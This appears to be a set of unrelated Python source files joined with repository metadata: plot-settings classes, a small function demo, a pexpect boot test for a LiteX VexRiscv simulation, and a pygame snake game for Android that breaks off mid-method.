TEXT_SIZES = ('6', '8', '10', '12', '14', '16', '18', '20', '22', '24')
TEXT_BITMAPS = (None, None, None, None, None, None, None, None, None, None)
class SettingsLinewidth(Variable):
    """Plot line width preference (1-10)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Linewidth'
        self._choices = LINE_SIZES
        self._choice_images = (ico.linewidth_1_16x16, ico.linewidth_2_16x16, ico.linewidth_3_16x16,
                               ico.linewidth_4_16x16, ico.linewidth_5_16x16, ico.linewidth_6_16x16,
                               ico.linewidth_7_16x16, ico.linewidth_8_16x16, ico.linewidth_9_16x16,
                               ico.linewidth_10_16x16)
        self._pytype = tuple
class SettingsMarkerSize(Variable):
    """Plot marker size preference (1-10)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Marker size'
        self._choices = LINE_SIZES
        self._choice_images = (ico.markersize_1_16x16, ico.markersize_2_16x16, ico.markersize_3_16x16,
                               ico.markersize_4_16x16, ico.markersize_5_16x16, ico.markersize_6_16x16,
                               ico.markersize_7_16x16, ico.markersize_8_16x16, ico.markersize_9_16x16,
                               ico.markersize_10_16x16)
        self._pytype = tuple
class SettingsTickLabelSize(Variable):
    """Axis tick-label font size preference."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Tick-label size'
        self._choices = TEXT_SIZES
        self._choice_images = TEXT_BITMAPS
        self._pytype = tuple
class SettingsLabelSize(Variable):
    """Axis label font size preference."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Label size'
        self._choices = TEXT_SIZES
        self._choice_images = TEXT_BITMAPS
        self._pytype = tuple
class SettingsLegendSize(Variable):
    """Legend font size preference."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Legend size'
        self._choices = TEXT_SIZES
        self._choice_images = TEXT_BITMAPS
        self._pytype = tuple
# Shared percentile options for the case/shading selectors below.
PERCENTILE_OPTIONS = ('P05', 'P10', 'P20', 'P25', 'P30', 'P40', 'P50', 'P60', 'P70', 'P75', 'P80', 'P90', 'P95')
PERCENTILE_BITMAPS = (None, None, None, None, None, None, None, None, None, None, None, None, None)
class SettingsLowCase(Variable):
    """Percentile used as the low case."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Low case'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
        self._pytype = tuple
class SettingsMidCase(Variable):
    """Percentile used as the mid case."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Mid case'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
        self._pytype = tuple
class SettingsHighCase(Variable):
    """Percentile used as the high case."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'High case'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
        self._pytype = tuple
class SettingsShadingResolution(Variable):
    """Number of bands used when shading the uncertainty envelope."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Resolution'
        self._choices = ('2', '4', '6', '8', '10')
        self._choice_images = (None, None, None, None, None)
        self._pytype = tuple
class SettingsShadingLow(Variable):
    """Lower percentile bound of the shaded envelope."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Low bound'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
        self._pytype = tuple
class SettingsShadingHigh(Variable):
    """Upper percentile bound of the shaded envelope."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'High bound'
        self._choices = PERCENTILE_OPTIONS
        self._choice_images = PERCENTILE_BITMAPS
        self._pytype = tuple
# ======================================================================================================================
# Duplicate variables
# ======================================================================================================================
class Duplicates(Variable):
    """Number of duplicate entities to create."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = AmountUnit()
        self._frame_label = '# of duplicates'
        self._pytype = int
        self._tooltip = 'Number of duplicates to create.'
class DuplicateAsControlled(Variable):
    """Boolean toggle: duplicates inherit configuration from the source entity."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Duplicate as controlled'
        self._pytype = bool
        self._tooltip = 'Duplicated entities will only allow minor\n' \
                        'configuration. All properties will be determined\n' \
                        'by the controlling entity (the one duplicated).'
| 2.28125 | 2 |
functions.py | gjoe344/python-learning | 0 | 12765099 |
# Demo: a function returning several values as a tuple.
def add(x,y):
    """Return the sum of x and y together with two fixed demo strings."""
    total = x + y
    note = 'I am here'
    greeting = 'hello'
    return total, note, greeting
x = 20
y = 5
# Call the function and print the 3-tuple it returns.
print(add(x,y))
z = add(x,y) # same result, captured in a variable first
print(z)
print(add(10,5)) # same function, literal arguments
.sim-test.py | niw/linux-on-litex-vexriscv | 329 | 12765100 | #!/usr/bin/env python3
#
# This file is part of Linux-on-LiteX-VexRiscv
#
# Copyright (c) 2019-2021, Linux-on-LiteX-VexRiscv Developers
# SPDX-License-Identifier: BSD-2-Clause
import os
import sys
import pexpect
import time
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--sdram-module", type=str)
args = parser.parse_args()
# Each test: a command to spawn plus ordered checkpoints. A checkpoint passes
# when one of its 'good' byte-regex patterns matches the process output
# within 'timeout' seconds; an optional 'bad' list would fail the test.
tests = [
    {
        'id': 'linux-on-litex-vexriscv',
        'command': f'./sim.py --with-sdram --sdram-module {args.sdram_module}',
        'cwd': os.getcwd(),
        'checkpoints': [
            { 'timeout': 240, 'good': [b'\n\\s*BIOS built on'] },
            { 'timeout': 60, 'good': [b'\n\\s*VexRiscv Machine Mode software'] },
            { 'timeout': 240, 'good': [b'Memory: \\d+K/\\d+K available'] },
        ]
    }
]
def run_test(id, command, cwd, checkpoints):
    """Spawn `command` in `cwd` and walk the ordered `checkpoints`.

    Returns True when every checkpoint's 'good' pattern matched in order;
    False on process EOF, a checkpoint timeout, or a 'bad' pattern match.
    """
    print(f'*** Test ID: {id}')
    print(f'*** CWD: {cwd}')
    print(f'*** Command: {command}')
    os.chdir(cwd)
    # Child output is echoed live to stdout via logfile.
    p = pexpect.spawn(command, timeout=None, logfile=sys.stdout.buffer)
    checkpoint_id = 0
    for cp in checkpoints:
        good = cp.get('good', [])
        bad = cp.get('bad', [])
        patterns = good + bad
        timeout = cp.get('timeout', None)
        timediff = time.time()
        try:
            match_id = p.expect(patterns, timeout=timeout)
        except pexpect.EOF:
            print(f'\n*** {id}: premature termination')
            return False;
        except pexpect.TIMEOUT:
            timediff = time.time() - timediff
            print(f'\n*** {id}: timeout (checkpoint {checkpoint_id}: +{int(timediff)}s)')
            return False;
        timediff = time.time() - timediff
        # Indices at or past len(good) matched a 'bad' pattern -> stop early;
        # checkpoint_id is then short of len(checkpoints) and the test fails.
        if match_id >= len(good):
            break
        sys.stdout.buffer.write(b'<<checkpoint %d: +%ds>>' % (checkpoint_id, int(timediff)))
        checkpoint_id += 1
    is_success = checkpoint_id == len(checkpoints)
    # Let it print rest of line
    match_id = p.expect_exact([b'\n', pexpect.TIMEOUT, pexpect.EOF], timeout=1)
    p.terminate(force=True)
    # Only add a newline if the child did not end its last line itself.
    line_break = '\n' if match_id != 0 else ''
    print(f'{line_break}*** {id}: {"success" if is_success else "failure"}')
    return is_success
# Run every test in order; exit non-zero on the first failure.
for test in tests:
    success = run_test(**test)
    if not success:
        sys.exit(1)
sys.exit(0)
| 2.203125 | 2 |
main.py | filipposerafini/PythonVsAndroid | 1 | 12765101 | import pygame_sdl2
pygame_sdl2.import_as_pygame()
import random
import pygame
from pygame.locals import *
import android
class AppleTypes:
    # Enum-like int constants; plain ints so they can index APPLE_COLORS.
    NORMAL, GOLDEN, LIFE, SPECIAL = range(4)
class Apple:
    """An apple on the grid; non-normal types expire and SPECIAL apples move."""
    def __init__(self, snakes):
        # Re-roll the position until it overlaps no snake segment.
        retry = True
        while retry:
            retry = False
            self.x = random.randint(0, CELL_COUNT_X - 1)
            self.y = random.randint(0, CELL_COUNT_Y - 1)
            for snake in snakes:
                for i in range(0, snake.length):
                    if self.x == snake.x[i] and self.y == snake.y[i]:
                        retry = True
        # Weighted type: 9/12 normal, 1/12 each golden/life/special.
        self.type = random.choice([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3])
        self.expiration = 0
        self.moves = 0
        self.direction = random.choice([0, 1, 2, 3])
        # Bug fix: the original tested the builtin `type` instead of
        # `self.type`, so every apple (normal included) received an expiration
        # timer and SPECIAL apples never got their initial move counter.
        if not self.type == AppleTypes.NORMAL:
            self.expiration = APPLE_EXPIRATION
        if self.type == AppleTypes.SPECIAL:
            self.moves = SPECIAL_FRAMES
    def move(self):
        """Random-walk one cell every SPECIAL_FRAMES ticks, bouncing off walls.

        Directions: 0 = right, 1 = down, 2 = left, 3 = up; the current
        direction is heavily weighted (7/10) so movement looks smooth.
        """
        if self.moves == 0:
            dir = random.choice([
                self.direction,
                self.direction,
                self.direction,
                self.direction,
                self.direction,
                self.direction,
                self.direction,
                (self.direction + 1) % 4,
                (self.direction + 2) % 4,
                (self.direction + 3) % 4])
            if dir == 0:
                if not self.x == CELL_COUNT_X - 1:
                    self.x += 1
                else:
                    # At the right wall: step back and reverse direction.
                    self.x -= 1
                    self.direction = 2
            if dir == 1:
                if not self.y == CELL_COUNT_Y - 1:
                    self.y += 1
                else:
                    self.y -= 1
                    self.direction = 3
            if dir == 2:
                if not self.x == 0:
                    self.x -= 1
                else:
                    self.x += 1
                    self.direction = 1
            if dir == 3:
                if not self.y == 0:
                    self.y -= 1
                else:
                    self.y += 1
                    self.direction = 0
            self.moves = SPECIAL_FRAMES
        else:
            self.moves -= 1
    def draw(self, surface, cell_size):
        """Draw the apple as a filled cell coloured by its type."""
        body = pygame.Surface((cell_size, cell_size))
        body.fill(APPLE_COLORS[self.type])
        surface.blit(body, (self.x * cell_size, self.y * cell_size))
class Snake:
    """A player snake: parallel segment coordinate lists, score and lives.

    Directions: 0 = right, 1 = down, 2 = left, 3 = up. Index 0 of the
    coordinate lists is the head. temp_color differs from color while a
    temporary effect (RED = just hit, or an apple colour) is active.
    """
    def __init__(self, x, y, length, lives, color):
        self.x = [x]
        self.y = [y]
        self.length = length
        self.lives = lives
        self.color = color
        self.expiration = 0      # frames left before temp_color reverts
        self.temp_color = color
        # Start moving away from the nearest vertical wall.
        self.direction = 0 if self.x[0] < CELL_COUNT_X / 2 else 2
        self.score = 0
        # Lay the body out in a straight horizontal line behind the head.
        for i in range(1, self.length):
            self.x.append(self.x[0] - i if self.x[0] < CELL_COUNT_X / 2 else self.x[0] + i)
            self.y.append(self.y[0])
    def changeDirection(self, direction):
        """Apply a turn unless it is a 180-degree reversal; True if applied."""
        if direction != (self.direction + 2) % 4:
            self.direction = direction
            return True
        return False
    def updatePosition(self):
        """Shift every segment to its predecessor, then advance the head."""
        for i in range(self.length - 1 , 0, -1):
            self.x[i] = self.x[i - 1]
            self.y[i] = self.y[i - 1]
        if self.direction == 0:
            self.x[0] += 1
        elif self.direction == 1:
            self.y[0] += 1
        elif self.direction == 2:
            self.x[0] -= 1
        elif self.direction == 3:
            self.y[0] -= 1
    def isCollision(self, x, y):
        """True when the head occupies cell (x, y)."""
        if self.x[0] == x and self.y[0] == y:
            return True
        else:
            return False
    def changeColor(self, color):
        """Show `color` temporarily for SNAKE_EXPIRATION frames."""
        self.temp_color = color
        self.expiration = SNAKE_EXPIRATION
    def addPiece(self, count):
        """Grow by `count` segments stacked on the current tail cell."""
        for i in range(0, count):
            self.x.append(self.x[self.length - 1])
            self.y.append(self.y[self.length - 1])
            self.length += 1
    def eatApple(self, apple):
        """Apply the apple's effect if the head is on it; True when eaten."""
        if self.isCollision(apple.x, apple.y):
            if apple.type == AppleTypes.NORMAL:
                SOUNDS['Apple'].play()
                self.addPiece(1)
                self.score += 10
            elif apple.type == AppleTypes.GOLDEN:
                SOUNDS['Golden'].play()
                self.addPiece(3)
                self.score += 50
            elif apple.type == AppleTypes.LIFE:
                SOUNDS['Life'].play()
                self.addPiece(1)
                # Extra life, capped at 5; score instead when already maxed.
                if self.lives < 5:
                    self.lives += 1
                else:
                    self.score += 20
            elif apple.type == AppleTypes.SPECIAL:
                SOUNDS['Special'].play()
                self.addPiece(5)
                self.score += 100
            return True
        return False
    def hitSnake(self, snake):
        """True when the head hits `snake`'s body (own head excluded) and
        the invulnerability colour (RED) is not active; costs a life."""
        for i in range(1 if self is snake else 0, snake.length):
            if self.isCollision(snake.x[i], snake.y[i]) and not self.temp_color == RED:
                self.score -= 50
                self.lives -= 1
                return True
        return False
    def hitBorder(self):
        """Wrap the head to the opposite wall; costs a life unless RED."""
        if self.x[0] < 0 or self.x[0] > CELL_COUNT_X - 1:
            self.x[0] = CELL_COUNT_X - 1 if self.x[0] < 0 else 0
            if not self.temp_color == RED:
                self.score -= 20
                self.lives -= 1
                return True
            return False
        elif self.y[0] < 0 or self.y[0] > CELL_COUNT_Y - 1:
            self.y[0] = CELL_COUNT_Y - 1 if self.y[0] < 0 else 0
            if not self.temp_color == RED:
                self.score -= 20
                self.lives -= 1
                return True
            return False
        else:
            return False
    def draw(self, surface, cell_size):
        """Draw every segment in temp_color; revert colour when expired."""
        body = pygame.Surface((cell_size, cell_size))
        body.fill(self.temp_color)
        for i in range(0, self.length):
            surface.blit(body, (self.x[i] * cell_size, self.y[i] * cell_size))
        if self.expiration > 0:
            self.expiration -= 1
        else:
            self.temp_color = self.color
class Game:
    """One running game: the snakes, the apple, speed and control scheme."""
    def __init__(self, players, fps, controls):
        self.fps = fps
        self.controls = controls
        self.snakes = []
        # Bug fix: random.randint requires integer endpoints; CELL_COUNT_X / 2
        # is a float under Python 3 true division, so use floor division
        # (identical result for int cell counts on either Python version).
        self.snakes.append(Snake(random.randint(0, CELL_COUNT_X // 2), random.randint(0, CELL_COUNT_Y // 2), 15, 3, BLUE))
        if players == 2:
            # Player 2 spawns in the opposite (bottom-right) quadrant.
            self.snakes.append(Snake(random.randint(CELL_COUNT_X // 2, CELL_COUNT_X - 1), random.randint(CELL_COUNT_Y // 2, CELL_COUNT_Y - 1), 15, 3, GREEN))
        self.apple = Apple(self.snakes)
    def restart(self):
        """Return a fresh Game with the same player count, speed and controls."""
        return Game(len(self.snakes), self.fps, self.controls)
    def updateSnakes(self):
        """Advance one tick; return False when any snake runs out of lives."""
        # A non-normal apple downgrades to NORMAL once its timer runs out.
        if self.apple.expiration == 0:
            self.apple.type = AppleTypes.NORMAL
        else:
            self.apple.expiration -= 1
        if self.apple.type == AppleTypes.SPECIAL:
            self.apple.move()
        for snake in self.snakes:
            snake.updatePosition()
            # NOTE(review): only self-collisions are checked here, so in
            # two-player mode snakes pass through each other — confirm
            # whether snake-vs-snake collisions were intended.
            if snake.hitSnake(snake) or snake.hitBorder():
                SOUNDS['Hit'].play()
                android.vibrate(0.2)
                snake.changeColor(RED)
                if snake.lives == 0:
                    return False
            if snake.eatApple(self.apple):
                if not self.apple.type == AppleTypes.NORMAL:
                    snake.changeColor(APPLE_COLORS[self.apple.type])
                self.apple = Apple(self.snakes)
        return True
    def drawSnakes(self, surface, cell_size):
        """Draw every snake and then the apple onto `surface`."""
        for snake in self.snakes:
            snake.draw(surface, cell_size)
        self.apple.draw(surface, cell_size)
class Page(object):
    """Base class for a full-screen UI page drawn on a pygame surface."""
    def __init__(self, width, height, surface):
        self.surface = surface
        self.surface.fill(BLACK)
        self.buttons = {}      # button name -> clickable pygame Rect
    def update(self):
        # Per-frame redraw hook; subclasses override to refresh dynamic parts.
        return
    def getButton(self, x, y):
        """Return the name of the button at fractional coordinates (x, y)
        in [0, 1], or None when nothing was hit."""
        for button, rect in self.buttons.items():
            if rect.collidepoint(x * self.surface.get_width(), y * self.surface.get_height()):
                return button
    def display_text(self, text, dimension, color, position, background=None):
        """Render `text` anchored by its midbottom at `position`; return the
        blitted Rect (also used as the button hit area)."""
        font = pygame.font.Font('resources/font.otf', int(dimension))
        text_surface = font.render(text, True, color, background)
        rect = text_surface.get_rect()
        rect.midbottom = position
        self.surface.blit(text_surface, rect)
        return rect
class Menu(Page):
    """Main menu: the title plus Single/Multi/Settings/Leaderboard buttons."""
    def __init__(self, width, height, surface):
        super(Menu, self).__init__(width, height, surface)
        # Three-colour title: 'Python VS Android'.
        self.display_text('Python', height / 4, BLUE, (2 * width / 7 + width / 64, 2 * height / 5))
        self.display_text('VS', height / 7, RED, (width / 2, 2 * height / 5 - height / 50))
        self.display_text('Android', height / 4, GREEN, (5 * width / 7, 2 * height / 5))
        self.buttons['Single'] = self.display_text('Single Player', height / 10, WHITE, (width / 3, 4.5 * height / 7))
        self.buttons['Multi'] = self.display_text('Multi Player', height / 10, WHITE, (2 * width / 3, 4.5 * height / 7))
        self.buttons['Settings'] = self.display_text(' Settings ', height / 10, BLACK, (width / 3, 6 * height / 7), WHITE)
        self.buttons['Leaderboard'] = self.display_text(' Leaderboard ', height / 10, BLACK, (2 * width / 3, 6 * height / 7), WHITE)
class Leaderboard(Page):
    """Leaderboard page: top-3 scores per difficulty column."""
    def __init__(self, width, height, surface):
        super(Leaderboard, self).__init__(width, height, surface)
        self.display_text('Leaderboard:', height / 6, YELLOW, (width / 2, 2 * height / 7))
        difficulty = ['Easy', 'Normal', 'Hard']
        # Static row numbers and column headers.
        for i in range (1, 4):
            self.display_text(str(i) + '.', height / 10, BLUE, (width / 12, height / 2 + (i + 1) * height / 10))
            self.display_text(difficulty[i - 1], height / 8, RED, (i * width / 4, height / 2))
        # Score lists keyed by DIFFICULTY values; filled in by the caller.
        self.scores = {
                DIFFICULTY['Easy']: [],
                DIFFICULTY['Normal']: [],
                DIFFICULTY['Hard']: []
                }
        self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
    def update(self):
        """Redraw up to three scores in each difficulty column."""
        super(Leaderboard, self).update()
        width = self.surface.get_width()
        height = self.surface.get_height()
        score = self.scores[DIFFICULTY['Easy']]
        for i in range(0, min(len(score), 3)):
            self.display_text(str(score[i]), height / 10, WHITE, (width / 4, height / 2 + (i + 2) * height / 10))
        score = self.scores[DIFFICULTY['Normal']]
        for i in range(0, min(len(score), 3)):
            self.display_text(str(score[i]), height / 10, WHITE, (width / 2, height / 2 + (i + 2) * height / 10))
        score = self.scores[DIFFICULTY['Hard']]
        for i in range(0, min(len(score), 3)):
            self.display_text(str(score[i]), height / 10, WHITE, (3 * width / 4, height / 2 + (i + 2) * height / 10))
class Settings(Page):
    """Settings page: difficulty, control scheme, and music/sound toggles,
    persisted to resources/.settings as 'Key:Value' lines."""
    def __init__(self, width, height, surface):
        super(Settings, self).__init__(width, height, surface)
        self.display_text('Difficulty:', height / 7, WHITE, (width / 3, 2 * height / 6))
        self.display_text('Controls:', height / 7, WHITE, (width / 3 - width / 70, 7 * height / 12))
        self.display_text('Audio:', height / 7, WHITE, (width / 3 - width / 20, 5 * height / 6))
        self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
        # Defaults, used when no settings file exists or a value is unreadable.
        self.difficulty = 1
        self.controls = 0
        self.sound = True
        self.music = True
        self.loadSettings()
        pygame.mixer.music.set_volume(1 if self.music else 0)
    def update(self):
        """Redraw the current option values as clickable buttons."""
        super(Settings, self).update()
        width = self.surface.get_width()
        height = self.surface.get_height()
        key = list(DIFFICULTY.keys())[self.difficulty]
        self.buttons['Difficulty'] = self.display_text(' ' + key + ' ', height / 7, RED, (7 * width / 10, 2 * height / 6), BLACK)
        self.buttons['Controls'] = self.display_text(' ' + CONTROLS[self.controls] + ' ', height / 7, RED, (7 * width / 10, 7 * height / 12), BLACK)
        self.buttons['Music'] = self.display_text(' Music ', height / 9, WHITE if self.music else RED, (4 * width / 5, 5 * height / 6 - height / 50), RED if self.music else BLACK)
        self.buttons['Sound'] = self.display_text(' Sound ', height / 9, WHITE if self.sound else RED, (3 * width / 5, 5 * height / 6 - height / 50), RED if self.sound else BLACK)
    def loadSettings(self):
        """Best-effort read of resources/.settings; keep defaults on failure."""
        try:
            with open('resources/.settings', 'r') as f:
                for line in f:
                    # 'Key:Value' per line. partition()+strip() replaces the
                    # original split(':')[1][:-1], which corrupted the value
                    # on a final line without a trailing newline.
                    name, sep, value = line.partition(':')
                    if not sep:
                        continue
                    value = value.strip()
                    if name == 'Difficulty':
                        self.difficulty = int(value)
                    elif name == 'Controls':
                        self.controls = int(value)
                    elif name == 'Music':
                        self.music = value == 'True'
                    elif name == 'Sound':
                        self.sound = value == 'True'
        except (OSError, ValueError):
            # Bug fix: was a bare `except:` which also swallowed SystemExit /
            # KeyboardInterrupt; only file and parse errors are expected here.
            pass
    def saveSettings(self):
        """Persist the current settings, one 'Key:Value' per line."""
        with open('resources/.settings', 'w') as f:
            f.write('Difficulty:' + str(self.difficulty) + '\n')
            f.write('Controls:' + str(self.controls) + '\n')
            f.write('Music:' + str(self.music) + '\n')
            f.write('Sound:' + str(self.sound) + '\n')
class GameField(Page):
    """In-game page: draws the HUD, the snakes/apple, and the control areas."""
    def __init__(self, width, height, cell_size, surface):
        super(GameField, self).__init__(width, height, surface)
        self.cell_size = cell_size
        self.game = None     # attached Game instance; None before a game starts
    def update(self):
        """Redraw the HUD, game objects and control buttons for this frame."""
        super(GameField, self).update()
        self.surface.fill(BLACK)
        width = self.surface.get_width()
        height = self.surface.get_height()
        if not self.game == None:
            # Player 1 score and remaining lives.
            rect = self.display_text('Python: ' + str(self.game.snakes[0].score), height / 10, BLUE, (width / 8, height / 7), BLACK)
            self.display_text('x' + str(self.game.snakes[0].lives), height / 16, BLUE, (rect.right + width / 30, height / 7 - height / 100), BLACK)
            # Player 2 HUD is currently disabled:
            # if len(self.game.snakes) == 2:
            #     rect = self.display_text('Viper: ' + str(self.game.snakes[1].score), height / 10, GREEN, (width / 1.13, height / 7))
            #     self.display_text('x' + str(self.game.snakes[1].lives), height / 16, GREEN, (rect.left - width / 40, height / 7 - height / 100))
            self.game.drawSnakes(self.surface, self.cell_size)
            if self.game.controls == CONTROLS.index('Touch'):
                # Touch scheme: the screen is halved perpendicular to the
                # current heading; only the two valid turn directions are live.
                if self.game.snakes[0].direction % 2 == 0:
                    self.buttons['Up'] = Rect(0, 0, width, height / 2)
                    self.buttons['Down'] = Rect(0, height / 2, width, height / 2)
                    self.buttons['Left'] = Rect(0, 0, 0, 0)
                    self.buttons['Right'] = Rect(0, 0, 0, 0)
                else:
                    self.buttons['Left'] = Rect(0, 0, width / 2, height)
                    self.buttons['Right'] = Rect(width / 2, 0, width / 2, height)
                    self.buttons['Up'] = Rect(0, 0, 0, 0)
                    self.buttons['Down'] = Rect(0, 0, 0, 0)
            elif self.game.controls == CONTROLS.index('Buttons'):
                # Buttons scheme: up/down arrows bottom-left, left/right bottom-right.
                pointlist = [
                        (width / 5 - height / 14, 5 * height / 7 - height / 28),
                        (width / 5, 4 * height / 7 - height / 28),
                        (width / 5 + height / 14, 5 * height / 7 - height / 28)
                        ]
                self.buttons['Up'] = pygame.draw.polygon(self.surface, GREY, pointlist)
                pointlist = [
                        (width / 5 - height / 14, 5 * height / 7 + height / 28),
                        (width / 5, 6 * height / 7 + height / 28),
                        (width / 5 + height / 14, 5 * height / 7 + height / 28)
                        ]
                self.buttons['Down'] = pygame.draw.polygon(self.surface, GREY, pointlist)
                pointlist = [
                        (4 * width / 5 - height / 28, 5 * height / 7 + height / 14),
                        (4 * width / 5 - height / 28 - height / 7, 5 * height / 7),
                        (4 * width / 5 - height / 28, 5 * height / 7 - height / 14)
                        ]
                self.buttons['Left'] = pygame.draw.polygon(self.surface, GREY, pointlist)
                pointlist = [
                        (4 * width / 5 + height / 28, 5 * height / 7 + height / 14),
                        (4 * width / 5 + height / 28 + height / 7, 5 * height / 7),
                        (4 * width / 5 + height / 28, 5 * height / 7 - height / 14)
                        ]
                self.buttons['Right'] = pygame.draw.polygon(self.surface, GREY, pointlist)
            elif self.game.controls == CONTROLS.index('Inverted'):
                # Inverted scheme: same arrows with the two clusters swapped.
                pointlist = [
                        (4 * width / 5 - height / 14, 5 * height / 7 - height / 28),
                        (4 * width / 5, 4 * height / 7 - height / 28),
                        (4 * width / 5 + height / 14, 5 * height / 7 - height / 28)
                        ]
                self.buttons['Up'] = pygame.draw.polygon(self.surface, GREY, pointlist)
                pointlist = [
                        (4 * width / 5 - height / 14, 5 * height / 7 + height / 28),
                        (4 * width / 5, 6 * height / 7 + height / 28),
                        (4 * width / 5 + height / 14, 5 * height / 7 + height / 28)
                        ]
                self.buttons['Down'] = pygame.draw.polygon(self.surface, GREY, pointlist)
                pointlist = [
                        (width / 5 - height / 28, 5 * height / 7 + height / 14),
                        (width / 5 - height / 28 - height / 7, 5 * height / 7),
                        (width / 5 - height / 28, 5 * height / 7 - height / 14)
                        ]
                self.buttons['Left'] = pygame.draw.polygon(self.surface, GREY, pointlist)
                pointlist = [
                        (width / 5 + height / 28, 5 * height / 7 + height / 14),
                        (width / 5 + height / 28 + height / 7, 5 * height / 7),
                        (width / 5 + height / 28, 5 * height / 7 - height / 14)
                        ]
                self.buttons['Right'] = pygame.draw.polygon(self.surface, GREY, pointlist)
class Pause(Page):
    """Overlay page shown while the game is paused.

    The last game frame is dimmed and used as the backdrop, with the pause
    title and two buttons ('Menu', 'Unpause') drawn on top.
    """

    def __init__(self, width, height, surface, game_surface):
        super(Pause, self).__init__(width, height, surface)
        # Dim the frozen game frame and draw it as the backdrop.
        self.surface.fill(WHITE)
        self.game_surface = game_surface
        self.game_surface.set_alpha(220)
        self.surface.blit(self.game_surface, (0, 0))
        self.display_text('Paused', height / 4, YELLOW, (width / 2, height / 2))
        # Button table: key, label, color, x position (shared y).
        button_y = 3 * height / 4
        for key, label, colour, pos_x in (
                ('Menu', 'Back to Menu', RED, 5 * width / 16),
                ('Unpause', 'Resume', GREEN, 11 * width / 16)):
            self.buttons[key] = self.display_text(label, height / 8, colour, (pos_x, button_y))
class NotImplementedPage(Page):
    """Placeholder page for features that are not available yet."""

    def __init__(self, width, height, surface):
        super(NotImplementedPage, self).__init__(width, height, surface)
        message_pos = (width / 2, 4 * height / 7)
        self.display_text('Feature not yet implemented', height / 8, RED, message_pos)
        back_pos = (width / 16, 5 * height / 36)
        self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, back_pos)
class GameOver(Page):
    """End-of-game screen: final score plus the difficulty's leaderboard.

    ``scores`` is the persisted leaderboard for the game's difficulty; the
    current score is merged into it (deduplicated, sorted best-first) and
    the top three entries are shown, highlighting the player's own score.
    ``game`` may be None, in which case only the title and buttons appear.
    """

    def __init__(self, width, height, game, scores, surface):
        super(GameOver, self).__init__(width, height, surface)
        self.game = game
        self.scores = scores
        self.display_text('Game Over!', height / 4, RED, (width / 2, 2 * height / 6))
        # Identity check; was the non-idiomatic "if not self.game == None".
        if self.game is not None:
            if len(self.game.snakes) == 1:
                self.display_text('Score: ' + str(self.game.snakes[0].score), height / 8, GREEN, (width / 2, height / 2))
                self.display_text('Leaderboard:', height / 10, WHITE, (width / 2, 4 * height / 7 + height / 10))
                # Merge the new score, drop duplicates and sort best-first.
                self.scores.append(self.game.snakes[0].score)
                self.scores = list(set(self.scores))
                self.scores.sort(reverse=True)
                for i in range(0, min(len(self.scores), 3)):
                    # Highlight the entry that matches the player's score.
                    colour = GREEN if self.scores[i] == self.game.snakes[0].score else WHITE
                    self.display_text(str(i + 1) + '. ', height / 15, colour, (3 * width / 7, 4 * height / 7 + (i + 2) * height / 11))
                    self.display_text(str(self.scores[i]), height / 15, colour, (4 * width / 7, 4 * height / 7 + (i + 2) * height / 11))
            else:
                # TODO: two-player summary (per-snake score/lives totals and
                # winner banner) is not implemented; multiplayer mode is
                # currently routed to NotImplementedPage, so this branch is
                # never reached.
                pass
        self.buttons['Menu'] = self.display_text('Return', height / 10, WHITE, (width / 7, 17 * height / 18))
        self.buttons['Restart'] = self.display_text('Restart', height / 10, WHITE, (6 * width / 7, 17 * height / 18))
class UserInterface:
    """Top-level controller: owns the display, the page registry and the two
    event loops (one for the running game, one for every other page).

    NOTE(review): the handlers reference the module-level globals ``width``,
    ``height`` and ``cell_size`` rather than the constructor arguments —
    confirm these always match.
    """
    # Shared frame clock used to cap the in-game frame rate.
    clock = pygame.time.Clock()

    def __init__(self, width, height, cell_size):
        self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
        self.game = None                # active Game instance, if any
        self.pages = {}                 # page name -> Page instance
        self.pages['Settings'] = Settings(width, height, self.screen)
        self.pages['Menu'] = Menu(width, height, self.screen)
        self.current_page = None        # name of the page currently shown
        self.update_flag = True         # False suppresses one redundant redraw
        self.state = None               # screen snapshot for app backgrounding

    def fadeBetweenSurfaces(self, surface):
        """Fade *surface* in over the screen by stepping its alpha up."""
        for i in range(0, 255, ANIMATION_SPEED):
            surface.set_alpha(i)
            self.screen.blit(surface, (0,0))
            pygame.display.flip()

    def changePage(self, page):
        """Switch the UI to *page*.

        Persists state when leaving certain pages (the leaderboard after a
        single-player GameOver, settings after Settings), then adjusts the
        music and redraws.
        """
        if self.current_page == 'GameOver' and len(self.game.snakes) == 1:
            self.saveLeaderboard(self.pages[self.current_page].scores, self.game.fps)
        elif self.current_page == 'Settings':
            self.pages[self.current_page].saveSettings()
        self.playMusic(page)
        self.current_page = page
        self.update()

    def handleGame(self):
        """Process one frame of the running game.

        Returns False when the app should exit, True otherwise.
        """
        self.clock.tick(self.game.fps)
        # Only the first successful direction change per frame is accepted.
        python_flag = False
        for event in pygame.event.get():
            if event.type == QUIT:
                return False
            elif event.type == APP_TERMINATING:
                return False
            elif event.type == APP_WILLENTERBACKGROUND:
                # Mobile: app going to background — pause and snapshot screen.
                self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
                self.changePage('Pause')
